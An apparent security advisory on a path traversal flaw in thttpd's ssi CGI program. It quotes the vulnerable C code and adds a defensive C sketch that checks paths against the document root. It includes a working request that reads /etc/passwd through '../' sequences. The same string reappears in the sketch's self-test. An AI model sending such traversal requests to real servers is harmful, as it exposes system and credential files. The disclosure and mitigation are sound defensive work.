`ssi (server-side includes) is a CGI proggie that comes by default
with the thttpd web server; I am not sure about others.
ssi has a nasty bug with regard to the PATH_TRANSLATED env var.
As the code below shows, the contents of PATH_TRANSLATED get copied into path_translated,
which gets fopen()'ed later.
It does no checking on the path_translated string. After it opens the file
it runs the read_file() function which returns the contents of fp.
So, as you can plainly see, we can view any file on the system.
Try:
GET /cgi-bin/ssi//../../../../../../../../../etc/passwd
This would yield the passwd file.
    path_translated = getenv( "PATH_TRANSLATED" );
    if ( path_translated == (char*) 0 )
        {
        internal_error( "Couldn't get PATH_TRANSLATED environment variable." );
        exit( 1 );
        }
    /* Open it. */
    fp = fopen( path_translated, "r" );
    read_file( path_info, path_translated, fp );
`
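The missing check, sketched as an added example (not thttpd's code and not the fix the project shipped): canonicalize the path and refuse it unless it lies under the document root before calling fopen(). The names open_under_root, allowed and selftest, and the temporary directory, are assumptions made for illustration.

```c
#define _XOPEN_SOURCE 700   /* for realpath() and mkdtemp() */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: fopen() path only if its canonical form is under root (root != "/"). */
FILE *open_under_root(const char *root, const char *path)
{
    char real_root[PATH_MAX], real_path[PATH_MAX];
    size_t n;
    /* realpath() collapses "..", "//" and symlinks; it fails if the file is missing. */
    if (!realpath(root, real_root) || !realpath(path, real_path))
        return NULL;
    n = strlen(real_root);
    /* Require a separator after the prefix so /srv/www does not match /srv/www-old. */
    if (strncmp(real_path, real_root, n) != 0 || real_path[n] != '/')
        return NULL;
    return fopen(real_path, "r");
}

/* Returns 1 if the path was opened (and closes it), 0 if it was refused. */
int allowed(const char *root, const char *path)
{
    FILE *fp = open_under_root(root, path);
    if (!fp) return 0;
    fclose(fp);
    return 1;
}

/* Constructed check: a throwaway docroot, one file inside it, one traversal path. */
int selftest(void)
{
    char root[] = "/tmp/ssi_root_XXXXXX", inside[PATH_MAX], evil[PATH_MAX];
    FILE *fp;
    int ok;
    if (!mkdtemp(root)) return -1;
    snprintf(inside, sizeof inside, "%s/index.html", root);
    snprintf(evil, sizeof evil, "%s//../../../../../../../../../etc/passwd", root);
    if (!(fp = fopen(inside, "w"))) return -1;
    fclose(fp);
    ok = allowed(root, inside) && !allowed(root, evil);
    unlink(inside);
    rmdir(root);
    return ok ? 0 : 1;
}

int main(void) { return selftest(); }
```

The check and the fopen() are separate steps, so a symlink swapped in between them is not covered by this sketch.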